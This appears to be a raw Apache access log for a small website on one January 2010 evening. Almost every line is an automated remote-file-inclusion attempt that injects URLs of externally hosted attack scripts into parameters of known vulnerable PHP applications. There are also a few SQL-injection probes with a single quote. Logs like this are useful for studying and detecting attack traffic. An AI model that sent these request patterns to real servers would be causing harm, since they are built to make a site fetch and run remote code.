118.129.166.190 - - [10/Jan/2010:17:55:55 -0800] "GET /logs/access_090824.log///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:56:18 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:56:18 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:56:30 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:56:30 -0800] "GET /logs/access_090824.log///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:56:30 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.180.37 - - [10/Jan/2010:17:59:57 -0800] "GET //help.php?css_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.180.37 - - [10/Jan/2010:17:59:57 -0800] "GET /logs/access_091109.log%20%20///help.php?css_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.180.37 - - [10/Jan/2010:17:59:57 -0800] "GET /logs///help.php?css_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.180.37 - - [10/Jan/2010:18:01:27 -0800] "GET /logs/access_091109.log///help.php?css_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:19:07 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:19:07 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:19:07 -0800] "GET /logs/access_090803.log//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:19:11 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:19:13 -0800] "GET /logs/access_090803.log//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:19:13 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.235.148 - - [10/Jan/2010:18:21:53 -0800] "GET /delete_all.php?board_skin_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
62.67.235.148 - - [10/Jan/2010:18:21:53 -0800] "GET /logs//delete_all.php?board_skin_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:22:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:38 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:40 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:41 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:43 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:44 -0800] "GET /logs/access_090803.log%20%20//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:46 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:50 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:50 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:55 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:23:59 -0800] "GET /logs/access_090803.log%20%20//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:24:45 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:24:45 -0800] "GET /logs/access_091207.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:18:25:11 -0800] "GET /logs//stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:18:25:11 -0800] "GET /stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:18:25:11 -0800] "GET /logs/access_100104.log%20%20//stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:25:20 -0800] "GET /logs/access_091207.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:25:22 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:18:27:03 -0800] "GET /logs/access.log%20%20//stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [10/Jan/2010:18:27:04 -0800] "GET /stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [10/Jan/2010:18:27:04 -0800] "GET /logs//stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:07 -0800] "GET /logs/access_091109.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:33 -0800] "GET /logs/access_090817.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:40 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:41 -0800] "GET /logs/access_091109.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:43 -0800] "GET /logs/access_090817.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:43 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:45 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:47 -0800] "GET /logs/access_090817.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:57 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:27:58 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:28:00 -0800] "GET /logs/access_090817.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:28:03 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:29:04 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:29:11 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [10/Jan/2010:18:45:38 -0800] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:18:45:42 -0800] "GET /logs/access_090720.log//stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:18:46:07 -0800] "GET /logs/access_091012.log//stubjambo.php?baseDir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.106.147.35 - - [10/Jan/2010:18:54:22 -0800] "GET /logs/access.log/news_detail.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.106.147.35 - - [10/Jan/2010:18:54:22 -0800] "GET /news_detail.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.106.147.35 - - [10/Jan/2010:18:54:23 -0800] "GET /logs/news_detail.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.106.147.35 - - [10/Jan/2010:18:54:50 -0800] "GET /logs/access_100104.log/news_detail.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:57:51 -0800] "GET /logs/access_090629.log%20%20/index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:57:51 -0800] "GET /logs/index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:57:51 -0800] "GET /index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:57:56 -0800] "GET /index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:57:56 -0800] "GET /logs/access_090629.log%20%20/index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:57:56 -0800] "GET /logs/index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:59:33 -0800] "GET /logs/access_090921.log%20%20/index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:18:59:37 -0800] "GET /logs/access_090921.log%20%20/index.php?doc=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.109.22.68 - - [10/Jan/2010:18:59:45 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.109.22.68 - - [10/Jan/2010:18:59:46 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.109.22.68 - - [10/Jan/2010:18:59:47 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.109.22.68 - - [10/Jan/2010:18:59:50 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.109.22.68 - - [10/Jan/2010:18:59:50 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.109.22.68 - - [10/Jan/2010:18:59:51 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.45.62 - - [10/Jan/2010:19:00:31 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:00:31 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:00:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.109.22.68 - - [10/Jan/2010:19:01:01 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.109.22.68 - - [10/Jan/2010:19:01:01 -0800] "GET /logs/access_100104.log//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.109.22.68 - - [10/Jan/2010:19:01:01 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [10/Jan/2010:19:01:10 -0800] "GET /logs/access_090921.log HTTP/1.1" 200 5427548 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:01:23 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.109.22.68 - - [10/Jan/2010:19:01:36 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.109.22.68 - - [10/Jan/2010:19:01:37 -0800] "GET /logs/access_100104.log//bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.109.22.68 - - [10/Jan/2010:19:01:37 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:03:49 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:03:49 -0800] "GET /logs/access_090525.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:03:49 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:04:29 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:04:29 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:04:29 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:06:01 -0800] "GET /logs/access_090727.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [10/Jan/2010:19:06:39 -0800] "GET /logs/access_100104.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [10/Jan/2010:19:07:09 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [10/Jan/2010:19:07:09 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [10/Jan/2010:19:07:09 -0800] "GET /logs/access_090921.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [10/Jan/2010:19:07:09 -0800] "GET /logs/access_091109.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:07:11 -0800] "GET /logs/access_090921.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:07:11 -0800] "GET /logs/access_091109.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:07:11 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:07:11 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:19:10:17 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:19:10:17 -0800] "GET /logs/access_090921.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:19:10:17 -0800] "GET /logs/access_091109.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:19:10:18 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [10/Jan/2010:19:10:51 -0800] "GET /logs/access.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [10/Jan/2010:19:10:51 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [10/Jan/2010:19:10:51 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [10/Jan/2010:19:12:58 -0800] "GET /logs/access_100104.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [10/Jan/2010:19:14:53 -0800] "GET /index.php?config=1&base_datapath=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
